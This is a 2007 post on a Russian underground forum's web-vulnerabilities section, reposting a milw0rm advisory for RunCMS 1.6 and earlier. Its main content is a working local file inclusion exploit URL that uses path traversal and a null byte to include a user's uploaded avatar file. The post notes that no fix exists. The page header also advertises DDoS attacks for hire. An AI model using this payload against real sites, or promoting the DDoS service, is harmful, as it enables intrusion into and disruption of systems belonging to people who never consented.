Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


RunCMS <= 1.6 Local File Inclusion Vulnerability

Автор aka PSIH , 25 Nov 2007 01:26

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
aka PSIH
Отправлено 25 November 2007 - 01:26

aka PSIH

    ~~~

  • Extended
  • PipPip
  • 238 сообщений
Title: RunCms Multiple Vulnerabilities
Vendor: ]]>http://www.runcms.org/]]>
Bugs: Local File Inclusion, Modules Authorization Weakness
Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x (prior versions also may be affected)
Exploitation: Remote with browser
Exploit: Available
Fix Available: No!

exp:
http://site.com/runcms_1.6/modules/news/?xoopsOption[pagetype]=../../images/avatar/users/[uid].gif%00

©milw0rm.com
Everything that was made by human is possible to crack => ideal protection does not exist
*********
icq:162295
*********
Обратно в Web уязвимости

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных

  1. ProLogic.Su
  2. Underground
  3. Уязвимости и Сплойты
  4. Web уязвимости